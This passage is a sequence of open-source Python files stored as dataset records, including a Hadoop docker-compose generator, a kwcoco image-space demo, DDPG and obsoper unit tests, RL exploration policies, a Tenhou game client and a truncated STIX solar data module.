1 ,inplace = True)\n\nprint('[INFO] Transforming course descriptions done.')\n\nprint('[INFO] Removing courses with generic descriptions.')\ndescript_df = descript_df[~descript_df.course_description.isna()]\ncourses_to_remove = ['Freshman Seminar', 'Freshman Seminars', 'Freshman/Sophomore Seminar', 'Sophomore Seminar', 'Sophomore Seminars', 'Berkeley Connect']\nremove_regex = '|'.join(courses_to_remove)\ndescript_df = descript_df[~descript_df.course_title.str.contains(remove_regex, regex=True)]\ndescript_df = descript_df[~descript_df.course_name.str.contains('99')]\ndescript_df = descript_df[~descript_df.course_name.str.contains('98')]\ndescript_df = descript_df[~descript_df.course_name.str.contains('97')]\ndescript_df = descript_df[~descript_df.course_title.str.contains('special topics', case=False)]\ndescript_df = descript_df[~descript_df.course_title.str.contains('seminar', case=False)]\ndescript_df = descript_df[~descript_df.course_subject.str.contains('FPF', case=True)]\n\nprint('[INFO] Removing courses with generic descriptions done.')\n\nprint('[INFO] Merging vectors and descriptions...')\n\nvector_course_text_df = pd.merge(vect_df, descript_df, on = 'vector_course_identifier', how = 'left')\nvector_course_text_df.drop('vector_course_identifier', axis = 1, inplace = True)\nvector_course_text_df = vector_course_text_df[vector_course_text_df['course_name'].notnull()]\n\nprint('[INFO] Extract raw course vectors...')\n\nraw_vectors = vector_course_text_df[vector_course_text_df.columns.difference(['course_name', 'course_title', 'course_description', 'course_subject', 'course_alternative_names', 'vector_id'])]\n\nprint('[INFO] Extract corresponding course information...')\nvector_text = vector_course_text_df[['course_name', 'course_title', 'course_description', 'course_subject', 'course_alternative_names']]\n\nprint('[INFO] Writing to tsv files...')\n\nvector_text.to_csv(INTERMEDIATE_DATA_DIR+'/aligned_course_info.tsv', sep='\\t', index = False)\nraw_vectors.to_csv(INTERMEDIATE_DATA_DIR+'/aligned_course_vecs.tsv', sep='\\t', index = False)\n\nprint('[INFO] Data preprocessing complete.')\n","sub_path":"scripts/data_joining.py","file_name":"data_joining.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"401149291","text":"import yaml\nfrom yaml import dump\ntry:\n from yaml import CDumper as Dumper\nexcept ImportError:\n from yaml import Dumper\nimport copy\nfrom collections import OrderedDict\nfrom instance import DockerComponent, MultipleComponent, PrimaryNamenode, SecondaryNamenode, JournalNode, DataNode, \\\n ResourceManager, YarnHistoryServer, ClusterStarter, ClusterDb, ZookeeperNode, HiveServer, HiveMetastore, \\\n SparkHistory, SparkThrift, Hue, PrestoServer, PrestoWorker\nfrom argparse import Namespace\nfrom typing import List\n\n\n\nDOCKER_COMPOSE_YAML = OrderedDict({\n \"version\": \"3\",\n \"services\": {},\n \"networks\": {\n \"hadoop.net\": {\n \"external\": True\n }\n }\n})\n\nyaml.add_representer(type(None), lambda dumper, value: dumper.represent_scalar(u'tag:yaml.org,2002:null', ''),\n Dumper=Dumper)\nyaml.add_representer(OrderedDict, lambda self, data: self.represent_mapping('tag:yaml.org,2002:map', data.items()),\n Dumper=Dumper)\n\n\ndef generate_yaml(instances: List[DockerComponent]):\n compose_yaml = copy.deepcopy(DOCKER_COMPOSE_YAML)\n for instance in instances:\n instance_conf = {\n \"image\": instance.image,\n \"container_name\": instance.name,\n \"networks\": {\n \"hadoop.net\": None\n },\n \"tty\": True\n }\n if getattr(instance, \"ports\") and instance.ports:\n instance_conf[\"ports\"] = list(instance.ports)\n\n if getattr(instance, \"hosts\") and instance.hosts:\n instance_conf[\"networks\"][\"hadoop.net\"] = {\"aliases\": list(instance.hosts)}\n\n if getattr(instance, \"volumes\") and instance.volumes:\n instance_conf[\"volumes\"] = list(instance.volumes)\n\n if getattr(instance, \"environment\") and instance.environment:\n instance_conf[\"environment\"] = instance.environment\n\n if getattr(instance, \"more_options\") and instance.more_options:\n for k, v in instance.more_options.items():\n instance_conf[k] = v\n\n compose_yaml[\"services\"][instance.name] = instance_conf\n return dump(compose_yaml, Dumper=Dumper)\n\n\ndef build_components(args: Namespace) -> List[DockerComponent]:\n components = [ClusterStarter()]\n\n if args.all or args.hive or args.hue:\n components.append(ClusterDb(args))\n primary_nn = [PrimaryNamenode(), JournalNode(1), ZookeeperNode(1), YarnHistoryServer()]\n if args.all or args.hive:\n primary_nn.append(HiveServer())\n primary_nn.append(HiveMetastore())\n\n if args.all or args.presto:\n primary_nn.append(PrestoServer())\n\n components.append(MultipleComponent(\"primary-namenode\", primary_nn))\n\n secondary_nn = [SecondaryNamenode(), JournalNode(2), ZookeeperNode(2), ResourceManager()]\n\n if args.all or args.spark or args.spark_history or args.spark_thrift:\n secondary_nn.append(SparkHistory())\n\n if args.all or args.spark_thrift:\n secondary_nn.append(SparkThrift())\n\n components.append(MultipleComponent(\"secondary-namenode\", secondary_nn))\n\n datanode1 = [DataNode(1), JournalNode(3), ZookeeperNode(3)]\n if args.all or args.presto:\n datanode1.append(PrestoWorker(1))\n components.append(MultipleComponent(\"datanode1\", datanode1))\n\n additional_datanodes = []\n for i in range(2, args.num_datanode + 1):\n additional_datanodes.append(DataNode(i))\n\n # Add presto worker in data node, num of presto worker does not exceed num of datanode\n if (args.all or args.presto) and args.num_presto_worker > 1:\n worker_cnt = 1\n while worker_cnt < args.num_presto_worker and worker_cnt < len(additional_datanodes):\n datanode = additional_datanodes[worker_cnt - 1]\n additional_datanodes[worker_cnt - 1] = MultipleComponent(datanode.name, [datanode,\n PrestoWorker(worker_cnt + 1)])\n worker_cnt += 1\n\n components += additional_datanodes\n\n if args.hue or args.all:\n components.append(Hue(args))\n\n return components\n","sub_path":"docker_compose.py","file_name":"docker_compose.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"431811050","text":"\"\"\"\nDemonstrates the core kwcoco spaces: video, image, and asset space.\n\"\"\"\n\n\ndef setup_data():\n \"\"\"\n This creates aligned video data similar to what might exist in a real world\n use case.\n \"\"\"\n import ubelt as ub\n import kwimage\n\n demo_dpath = ub.Path.appdir('kwcoco/demo/demo_spaces').ensuredir()\n asset_dpath = (demo_dpath / 'assets').ensuredir()\n raw = kwimage.grab_test_image('amazon', dsize=(512, 512))\n raw = kwimage.ensure_float01(raw)\n\n import kwcoco\n dset = kwcoco.CocoDataset()\n dset.fpath = demo_dpath / 'data.kwcoco.json'\n\n video_id = dset.add_video(name='demo_video', width=512, height=512)\n\n observations = [\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-32, -32), theta=0.02)},\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-64, -64), theta=0.05)},\n {'warp_img_from_vid': kwimage.Affine.coerce(offset=(-128, -128), theta=0.08)},\n ]\n for frame_idx, obs in enumerate(observations):\n warp_img_from_vid = obs['warp_img_from_vid']\n\n ideal_img_frame = kwimage.warp_affine(raw, warp_img_from_vid, dsize='positive', border_value=float('nan'))\n img_h, img_w = ideal_img_frame.shape[0:2]\n\n # pan is shifted a little bit\n pan = kwimage.convert_colorspace(ideal_img_frame, 'rgb', 'gray')\n warp_pan_from_img = kwimage.Affine.coerce(offset=(-2, -3))\n\n image_name = f'frame_{frame_idx:03d}'\n frame_dpath = (asset_dpath / image_name).ensuredir()\n\n pan_fpath = frame_dpath / 'pan.tif'\n red_fpath = frame_dpath / 'red.tif'\n green_fpath = frame_dpath / 'green.tif'\n blue_fpath = frame_dpath / 'blue.tif'\n\n # Some assets are smaller than others\n warp_msi_from_img = kwimage.Affine.scale(0.5)\n msi = kwimage.warp_affine(ideal_img_frame, warp_msi_from_img, dsize='positive', border_value=float('nan'))\n red = msi[..., 0]\n green = msi[..., 1]\n blue = msi[..., 2]\n\n kwimage.imwrite(pan_fpath, pan)\n kwimage.imwrite(red_fpath, red)\n kwimage.imwrite(green_fpath, green)\n kwimage.imwrite(blue_fpath, blue)\n\n gid = dset.add_image(name=image_name, frame_index=frame_idx,\n width=img_w, height=img_h, video_id=video_id,\n warp_img_to_vid=warp_img_from_vid.inv())\n\n coco_img = dset.coco_image(gid)\n\n coco_img.add_asset(pan_fpath, channels='pan', warp_aux_to_img=warp_pan_from_img.inv())\n coco_img.add_asset(red_fpath, channels='red', warp_aux_to_img=warp_msi_from_img.inv())\n coco_img.add_asset(green_fpath, channels='green', warp_aux_to_img=warp_msi_from_img.inv())\n coco_img.add_asset(blue_fpath, channels='blue', warp_aux_to_img=warp_msi_from_img.inv())\n return dset\n\n\ndef main():\n import kwimage\n dset = setup_data()\n\n def build_space_frames(space):\n frame_stack = []\n for coco_img in dset.images().coco_images:\n frame_index = coco_img.img['frame_index']\n asset_stack = []\n for chan in coco_img.channels.fuse().to_list():\n asset_data = coco_img.imdelay(chan, space=space).finalize(nodata_method='float')\n asset_data = kwimage.fill_nans_with_checkers(asset_data)\n asset_data = kwimage.draw_header_text(asset_data, f'T={frame_index} : {chan}')\n asset_stack.append(asset_data)\n asset_row = kwimage.stack_images(asset_stack, axis=1, pad=10, bg_value='kitware_green')\n frame_stack.append(asset_row)\n canvas = kwimage.stack_images(frame_stack, axis=0, pad=10, bg_value='kitware_green')\n return canvas\n\n asset_canvas = build_space_frames(space='asset')\n image_canvas = build_space_frames(space='image')\n video_canvas = build_space_frames(space='video')\n\n import ubelt as ub\n asset_blurb = ub.codeblock(\n '''\n This is a demonstration of \"asset space\".\n Each frame is a row, and each channel is a column.\n This is how images are saved on disk.\n Any alignment is delayed until the last possible moment.\n ''')\n image_blurb = ub.codeblock(\n '''\n This is a demonstration of \"image space\".\n Assets are aligned within an image, but are not necesarilly aligned across frames.\n The resolution is typically that of the largest asset in the image, but can be arbitrary.\n ''')\n video_blurb = ub.codeblock(\n '''\n This is a demonstration of \"video space\".\n Assets are aligned within an image and across frames.\n Resolution is usually set to that of some reference image, but it can be arbitrary.\n ''')\n\n import kwplot\n kwplot.autompl()\n kwplot.imshow(asset_canvas, title=asset_blurb, fnum=1)\n kwplot.imshow(image_canvas, title=image_blurb, fnum=2)\n kwplot.imshow(video_canvas, title=video_blurb, fnum=3)\n","sub_path":"examples/demo_kwcoco_spaces.py","file_name":"demo_kwcoco_spaces.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"482005929","text":"\"\"\" Test module for ddpg.model\n\nMostly based on baselines.common.tests.test_identity.py\n\"\"\"\n\nfrom itertools import chain\nimport pytest\nimport numpy as np\nimport tensorflow as tf\nimport logging\nfrom baselines.common.tests.envs.identity_env import BoxIdentityEnv\nfrom ddpg.experience_replay import ExperienceReplay\nfrom ddpg.main import parse_args\nfrom ddpg.monitor import Monitor\nfrom ddpg.model import Model\nfrom ddpg.runner import OrnsteinUhlenbeckNoise, Runner\n\nSEED = 2\nGAMMA = 0.9\nTOTAL_TIMESTEPS = 1100000\n\ndef test_target_update():\n \"\"\" Test if target update is working correctly. \"\"\"\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n kwargs['experience_replay_size'] = 10\n kwargs['minibatch_size'] = 5\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n np.random.seed(SEED)\n monitor = Monitor(env, None, 100)\n state = env.reset()\n experience_replay = ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n variables = list(chain(*model._primary_parameters))\n target_variables = list(chain(*model._target_parameters))\n runner = Runner(monitor, model, kwargs['test'], render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n values = sess.run(variables)\n target_values = sess.run(target_variables)\n for val, target_val, _, _ in zip(values, target_values, variables, target_variables):\n assert np.allclose(val, target_val)\n # Check for soft update\n for _ in range(15):\n runner.step()\n target_values = sess.run(target_variables)\n runner.train()\n for new_var, new_target_var, target_val in zip(variables, target_variables, target_values):\n new_val, new_target_val = sess.run((new_var, new_target_var))\n # new_target_val should be closer to target_val than new_val\n assert np.all(np.abs(new_target_val - target_val) - 1e-5 <= np.abs(new_target_val - new_val) + 1e-5 )\n\ndef test_reuse():\n \"\"\" Test if parameters are reused for primary network.\n\n The parameters of the critic_with_actor network and critic/actor networks must be the same. \"\"\"\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n kwargs['experience_replay_size'] = 10\n kwargs['minibatch_size'] = 5\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n np.random.seed(SEED)\n monitor = Monitor(env, None, 100)\n state = env.reset()\n experience_replay = ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n runner = Runner(monitor, model, kwargs['test'], render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n for _ in range(15):\n runner.step()\n runner.train()\n state = runner._state[np.newaxis, :]\n critic_with_actor = sess.run(model._critic_with_actor, feed_dict={model._state: state,\n model._training_phase: False})\n actor = model.next_action(runner._state)\n critic = sess.run(model._critic, feed_dict={model._state: state,\n model._critic_action: actor,\n model._training_phase: False})\n assert np.all(critic == critic_with_actor)\n\n@pytest.mark.slow\ndef test_discrete_identity():\n \"\"\" Test if it learns BoxIdentityEnv \"\"\"\n import os.path\n env = BoxIdentityEnv((1,), episode_len=100)\n kwargs = parse_args()\n log_level = kwargs['log_level']\n log_dir = kwargs['log_dir']\n log_path = os.path.join(log_dir, 'main.log')\n logging.basicConfig(level=getattr(logging, log_level.upper()), filename=log_path)\n tf.reset_default_graph()\n tf.set_random_seed(SEED)\n monitor = Monitor(env, log_dir, 100)\n state = env.reset()\n experience_replay = ExperienceReplay(kwargs['experience_replay_size'], kwargs['minibatch_size'],\n state_shape=state.shape,\n action_shape=env.action_space.shape)\n noise = OrnsteinUhlenbeckNoise(np.zeros(env.action_space.shape),\n kwargs['ou_theta'], kwargs['ou_sigma'])\n model = Model(env, **kwargs) # pylint:disable=missing-kwoa\n runner = Runner(monitor, model, kwargs['test'], log_dir=log_dir, render=kwargs['render'],\n experience_replay=experience_replay,\n ou_noise=noise)\n with tf.Session() as sess:\n model.initialize(sess)\n for _ in range(30000):\n runner.step()\n runner.train()\n assert np.all(monitor.average > -1),\\\n 'average reward {} is less than -1'.format(monitor.average[0])\n\nif __name__ == '__main__':\n test_discrete_identity()\n","sub_path":"test/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636225483","text":"import numpy as np\n\nfrom mushroom.utils.parameters import Parameter\n\n\nclass TDPolicy(object):\n def __init__(self):\n \"\"\"\n Constructor.\n\n \"\"\"\n self._approximator = None\n\n def __call__(self, *args):\n \"\"\"\n Compute the probability of taking action in a certain state following\n the policy.\n\n Args:\n *args (list): list containing a state or a state and an action.\n\n Returns:\n The probability of all actions following the policy in the given\n state if the list contains only the state, else the probability\n of the given action in the given state following the policy.\n\n \"\"\"\n raise NotImplementedError\n\n def draw_action(self, state):\n \"\"\"\n Sample an action in `state` using the policy.\n\n Args:\n state (np.ndarray): the state where the agent is.\n\n Returns:\n The action sampled from the policy.\n\n \"\"\"\n raise NotImplementedError\n\n def set_q(self, approximator):\n \"\"\"\n Args:\n approximator (object): the approximator to use.\n\n \"\"\"\n self._approximator = approximator\n\n def get_q(self):\n \"\"\"\n Returns:\n The approximator used by the policy.\n\n \"\"\"\n return self._approximator\n\n def __str__(self):\n return self.__name__\n\n\nclass EpsGreedy(TDPolicy):\n \"\"\"\n Epsilon greedy policy.\n\n \"\"\"\n def __init__(self, epsilon):\n \"\"\"\n Constructor.\n\n Args:\n epsilon (Parameter): the exploration coefficient. It indicates\n the probability of performing a random actions in the current\n step.\n\n \"\"\"\n self.__name__ = 'EpsGreedy'\n\n super(EpsGreedy, self).__init__()\n\n assert isinstance(epsilon, Parameter)\n self._epsilon = epsilon\n\n def __call__(self, *args):\n state = args[0]\n q = self._approximator.predict(np.expand_dims(state, axis=0)).ravel()\n max_a = np.argwhere(q == np.max(q)).ravel()\n\n p = self._epsilon.get_value(state) / float(self._approximator.n_actions)\n\n if len(args) == 2:\n action = args[1]\n if action in max_a:\n return p + (1. - self._epsilon.get_value(state)) / len(max_a)\n else:\n return p\n else:\n probs = np.ones(self._approximator.n_actions) * p\n probs[max_a] += (1. - self._epsilon.get_value(state)) / len(max_a)\n\n return probs\n\n def draw_action(self, state):\n if not np.random.uniform() < self._epsilon(state):\n q = self._approximator.predict(state)\n max_a = np.argwhere(q == np.max(q)).ravel()\n\n if len(max_a) > 1:\n max_a = np.array([np.random.choice(max_a)])\n\n return max_a\n\n return np.array([np.random.choice(self._approximator.n_actions)])\n\n def set_epsilon(self, epsilon):\n \"\"\"\n Setter.\n\n Args:\n epsilon (Parameter): the exploration coefficient. It indicates the\n probability of performing a random actions in the current step.\n\n \"\"\"\n assert isinstance(epsilon, Parameter)\n\n self._epsilon = epsilon\n\n def update(self, *idx):\n \"\"\"\n Update the value of the epsilon parameter (e.g. in case of different\n values of epsilon for each visited state according to the number of\n visits).\n\n Args:\n idx (int): value to use to update epsilon.\n\n \"\"\"\n self._epsilon.update(*idx)\n\n\nclass Softmax(TDPolicy):\n \"\"\"\n Softmax policy using a Boltzmann distribution.\n\n \"\"\"\n def __init__(self, tau):\n \"\"\"\n Constructor.\n\n Args:\n tau (float): the temperature of the distribution. As the temperature\n approaches infinity, the policy becomes more and more random. As the\n temperature approaches 0.0, the policy becomes more and more greedy.\n\n \"\"\"\n self.__name__ = 'Softmax'\n\n super(Softmax, self).__init__()\n self._tau = tau\n\n def __call__(self, *args):\n state = args[0]\n qs = np.ones(self._approximator.n_actions)\n for a in xrange(self._approximator.n_actions):\n qs[a] = (np.e**(self._approximator.predict(state, a) / self._tau))\n\n if len(args) == 2:\n action = args[1]\n\n return qs[action] / np.sum(qs)\n else:\n p = np.ones(qs.size)\n for i in xrange(p.size):\n p[i] = qs[i] / np.sum(qs)\n\n return p\n\n def draw_action(self, state):\n return np.array([np.random.choice(self._approximator.n_actions,\n p=self(state))])\n","sub_path":"mushroom/policy/td_policy.py","file_name":"td_policy.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"144856982","text":"# -*- coding: utf-8 -*-\nimport socket\n\nfrom tenhou.client import TenhouClient\nfrom utils.settings_handler import settings\n\n\ndef connect_and_play():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((settings.TENHOU_HOST, settings.TENHOU_PORT))\n\n client = TenhouClient(s)\n was_auth = client.authenticate()\n\n if was_auth:\n client.start_the_game()\n else:\n client.end_the_game()\n","sub_path":"project/tenhou/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222558973","text":"# pylint: disable=missing-docstring, invalid-name\nimport unittest\nimport numpy as np\nimport obsoper\nfrom obsoper import (exceptions,\n ObservationOperator)\n\n\nclass TestOperator(unittest.TestCase):\n def setUp(self):\n # Model grid\n self.grid_lons = [[0, 1],\n [3, 2]]\n self.grid_lats = [[0, 1],\n [0, 1]]\n self.grid_depths = None\n\n # Observation positions\n self.obs_lons = [1.5]\n self.obs_lats = [0.5]\n self.obs_depths = None\n\n # Forecasts/results\n self.analysis = [[1, 2],\n [3, 4]]\n self.counterparts = [2.5]\n\n def test_interpolate_given_tripolar_grid(self):\n fixture = obsoper.Operator(self.grid_lons,\n self.grid_lats,\n self.obs_lons,\n self.obs_lats,\n layout=\"tripolar\")\n result = fixture.interpolate(self.analysis)\n expect = self.counterparts\n np.testing.assert_array_almost_equal(expect, result, decimal=4)\n\n def test_interpolate_given_regular_grid(self):\n fixture = obsoper.Operator([100, 200],\n [10, 20],\n [120],\n [12],\n layout=\"regular\")\n result = fixture.interpolate(self.analysis)\n expect = [1.6]\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_interpolate_given_regional_grid(self):\n fixture = obsoper.Operator(self.grid_lons,\n self.grid_lats,\n self.obs_lons,\n self.obs_lats,\n layout=\"regional\")\n result = fixture.interpolate(self.analysis)\n expect = self.counterparts\n np.testing.assert_array_equal(expect, result)\n\n def test_constructor_given_unknown_layout_raises_exception(self):\n with self.assertRaises(exceptions.UnknownLayout):\n obsoper.Operator(None, None, None, None, layout=\"not a layout\")\n\n\nclass TestIncompatibleGrids(unittest.TestCase):\n def setUp(self):\n self.obs_shape = 7\n self.grid_shape = 3, 3\n self.different_grid_shape = 5, 5\n\n def test_interpolate_given_incompatible_shape_raises_exception(self):\n operator = obsoper.Operator(\n np.zeros(self.grid_shape),\n np.zeros(self.grid_shape),\n np.zeros(self.obs_shape),\n np.zeros(self.obs_shape))\n with self.assertRaises(exceptions.IncompatibleGrid):\n operator.interpolate(np.zeros(self.different_grid_shape))\n\n def test_interpolate_tripolar_given_incompatible_shape_raises_exception(self):\n operator = obsoper.Operator(\n np.zeros(self.grid_shape),\n np.zeros(self.grid_shape),\n np.zeros(self.obs_shape),\n np.zeros(self.obs_shape),\n layout=\"tripolar\")\n with self.assertRaises(exceptions.IncompatibleGrid):\n operator.interpolate(np.zeros(self.different_grid_shape))\n\n\nclass TestOperatorRegularGrid(unittest.TestCase):\n def setUp(self):\n self.grid_lons = np.array([0, 1])\n self.grid_lats = np.array([0, 1])\n self.s_levels = np.array([[[0, 1],\n [0, 1]],\n [[0, 1],\n [0, 2]]])\n self.z_levels = np.array([0, 1])\n self.field = np.array([[[11, 12],\n [13, 14]],\n [[21, 22],\n [23, 24]]])\n self.z_counterparts = 17.5\n self.s_counterparts = 17.4\n\n def make_operator(self, levels):\n obs_lons, obs_lats, obs_depths = [0.5], [0.5], [0.5]\n return obsoper.Operator(self.grid_lons,\n self.grid_lats,\n obs_lons,\n obs_lats,\n observed_depths=obs_depths,\n grid_depths=levels)\n\n def test_vertical_interpolation_given_regular_layout_and_s_levels(self):\n self.check_interpolate(self.s_levels, self.s_counterparts)\n\n def test_vertical_interpolation_given_regular_layout_and_z_levels(self):\n self.check_interpolate(self.z_levels, self.z_counterparts)\n\n def check_interpolate(self, levels, expect):\n fixture = self.make_operator(levels)\n result = fixture.interpolate(self.field)\n np.testing.assert_array_almost_equal(expect, result)\n\n\nclass TestObservationOperator(unittest.TestCase):\n def setUp(self):\n self.longitudes = np.arange(3)\n self.latitudes = np.arange(3)\n self.depths = np.tile([10, 20, 30, 40], (3, 3, 1))\n self.fixture = ObservationOperator(self.longitudes, self.latitudes,\n self.depths)\n\n # Pseudo-model field\n self.surface_field = np.ones((3, 3))\n self.full_field = np.ones((3, 3, 4))\n\n # Sample coordinates\n self.inside_lons = np.array([0.9])\n self.inside_lats = np.array([1.5])\n self.outside_lons = np.array([-0.1])\n self.outside_lats = np.array([3.1])\n self.nan_lons_masked = np.ma.MaskedArray([np.nan], mask=[True])\n self.lons_masked = np.ma.MaskedArray([999., 999.], mask=[False, True])\n self.lats_masked = np.ma.MaskedArray([999., 999.], mask=[False, True])\n\n def test_interpolate_given_coordinates_and_depths(self):\n observed_depths = np.array([[15]])\n result = self.fixture.interpolate(self.full_field, self.inside_lons,\n self.inside_lats, observed_depths)\n expect = np.array([[1]])\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_horizontal_interpolate(self):\n observed_lats, observed_lons = np.array([1]), np.array([1])\n result = self.fixture.horizontal_interpolate(self.surface_field,\n observed_lons,\n observed_lats)\n expect = [1]\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_vertical_interpolate_given_section(self):\n model_section = np.array([[1, 2, 3, 4],\n [5, 6, 7, 8]])\n model_depths = np.array([[10, 20, 30, 40],\n [10, 20, 30, 40]])\n observed_depths = np.array([[15],\n [35]])\n result = self.fixture.vertical_interpolate(model_section,\n model_depths,\n observed_depths)\n expect = np.array([[1.5],\n [7.5]])\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_horizontal_interpolate_given_data_outside_returns_masked(self):\n result = self.fixture.horizontal_interpolate(self.surface_field,\n self.outside_lons,\n self.outside_lats)\n expect = np.ma.masked_all((1,))\n self.assertMaskedArrayEqual(expect, result)\n\n def test_horizontal_interpolate_given_masked_lons_nan(self):\n result = self.fixture.horizontal_interpolate(self.surface_field,\n self.nan_lons_masked,\n self.outside_lats)\n expect = np.ma.masked_all((1,))\n self.assertMaskedArrayEqual(expect, result)\n\n def test_horizontal_interpolate_given_masked_positions(self):\n result = self.fixture.horizontal_interpolate(self.full_field,\n self.lons_masked,\n self.lats_masked)\n expect = np.ma.masked_all((2, 4))\n self.assertMaskedArrayEqual(expect, result)\n\n def assertMaskedArrayEqual(self, expect, result):\n self.assertEqual(expect.shape, result.shape)\n np.testing.assert_array_almost_equal(expect.compressed(),\n result.compressed())\n","sub_path":"obsoper/test/test_obsoper.py","file_name":"test_obsoper.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"411949328","text":"\"\"\"\nHigh level STIX data products created from single stand alone packets or a sequence of packects.\n\"\"\"\nfrom datetime import timedelta, datetime\nfrom itertools import chain\n\nimport astropy.units as u\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import QTable, vstack, unique\nfrom astropy.time import Time\n\nfrom stix.fits.calibration.integer_compression import decompress\nfrom stix.core.stix_datetime import scet_to_datetime\nfrom stix.fits.products.common import _get_detector_mask, _get_pixel_mask, _get_energy_bins, \\\n _get_compression_scheme, _get_num_energies, _get_sub_spectrum_mask\n\n# __all__ = ['LightCurve', 'Background', 'Spectra', 'Variance', 'CalibrationSpectra',\n# 'FlareFlagAndLocation', 'TMManagementAndFlareList', 'get_energies_from_mask']\n\nENERGY_CHANNELS = {\n 0: {'channel_edge': 0, 'energy_edge': 0, 'e_lower': 0.0, 'e_upper': 4.0, 'bin_width': 4.0,\n 'dE_E': 2.000, 'ql_channel': None},\n 1: {'channel_edge': 1, 'energy_edge': 4, 'e_lower': 4.0, 'e_upper': 5.0, 'bin_width': 1.0,\n 'dE_E': 0.222, 'ql_channel': 0},\n 2: {'channel_edge': 2, 'energy_edge': 5, 'e_lower': 5.0, 'e_upper': 6.0, 'bin_width': 1.0,\n 'dE_E': 0.182, 'ql_channel': 0},\n 3: {'channel_edge': 3, 'energy_edge': 6, 'e_lower': 6.0, 'e_upper': 7.0, 'bin_width': 1.0,\n 'dE_E': 0.154, 'ql_channel': 0},\n 4: {'channel_edge': 4, 'energy_edge': 7, 'e_lower': 7.0, 'e_upper': 8.0, 'bin_width': 1.0,\n 'dE_E': 0.133, 'ql_channel': 0},\n 5: {'channel_edge': 5, 'energy_edge': 8, 'e_lower': 8.0, 'e_upper': 9.0, 'bin_width': 1.0,\n 'dE_E': 0.118, 'ql_channel': 0},\n 6: {'channel_edge': 6, 'energy_edge': 9, 'e_lower': 9.0, 'e_upper': 10.0, 'bin_width': 1.0,\n 'dE_E': 0.105, 'ql_channel': 0},\n 7: {'channel_edge': 7, 'energy_edge': 10, 'e_lower': 10.0, 'e_upper': 11.0, 'bin_width': 1.0,\n 'dE_E': 0.095, 'ql_channel': 1},\n 8: {'channel_edge': 8, 'energy_edge': 11, 'e_lower': 11.0, 'e_upper': 12.0, 'bin_width': 1.0,\n 'dE_E': 0.087, 'ql_channel': 1},\n 9: {'channel_edge': 9, 'energy_edge': 12, 'e_lower': 12.0, 'e_upper': 13.0, 'bin_width': 1.0,\n 'dE_E': 0.080, 'ql_channel': 1},\n 10: {'channel_edge': 10, 'energy_edge': 13, 'e_lower': 13.0, 'e_upper': 14.0, 'bin_width': 1.0,\n 'dE_E': 0.074, 'ql_channel': 1},\n 11: {'channel_edge': 11, 'energy_edge': 14, 'e_lower': 14.0, 'e_upper': 15.0, 'bin_width': 1.0,\n 'dE_E': 0.069, 'ql_channel': 1},\n 12: {'channel_edge': 12, 'energy_edge': 15, 'e_lower': 15.0, 'e_upper': 16.0, 'bin_width': 1.0,\n 'dE_E': 0.065, 'ql_channel': 2},\n 13: {'channel_edge': 13, 'energy_edge': 16, 'e_lower': 16.0, 'e_upper': 18.0, 'bin_width': 1.0,\n 'dE_E': 0.061, 'ql_channel': 2},\n 14: {'channel_edge': 14, 'energy_edge': 18, 'e_lower': 18.0, 'e_upper': 20.0, 'bin_width': 2.0,\n 'dE_E': 0.105, 'ql_channel': 2},\n 15: {'channel_edge': 15, 'energy_edge': 20, 'e_lower': 20.0, 'e_upper': 22.0, 'bin_width': 2.0,\n 'dE_E': 0.095, 'ql_channel': 2},\n 16: {'channel_edge': 16, 'energy_edge': 22, 'e_lower': 22.0, 'e_upper': 25.0, 'bin_width': 3.0,\n 'dE_E': 0.128, 'ql_channel': 2},\n 17: {'channel_edge': 17, 'energy_edge': 25, 'e_lower': 25.0, 'e_upper': 28.0, 'bin_width': 3.0,\n 'dE_E': 0.113, 'ql_channel': 3},\n 18: {'channel_edge': 18, 'energy_edge': 28, 'e_lower': 28.0, 'e_upper': 32.0, 'bin_width': 4.0,\n 'dE_E': 0.133, 'ql_channel': 3},\n 19: {'channel_edge': 19, 'energy_edge': 32, 'e_lower': 32.0, 'e_upper': 36.0, 'bin_width': 4.0,\n 'dE_E': 0.118, 'ql_channel': 3},\n 20: {'channel_edge': 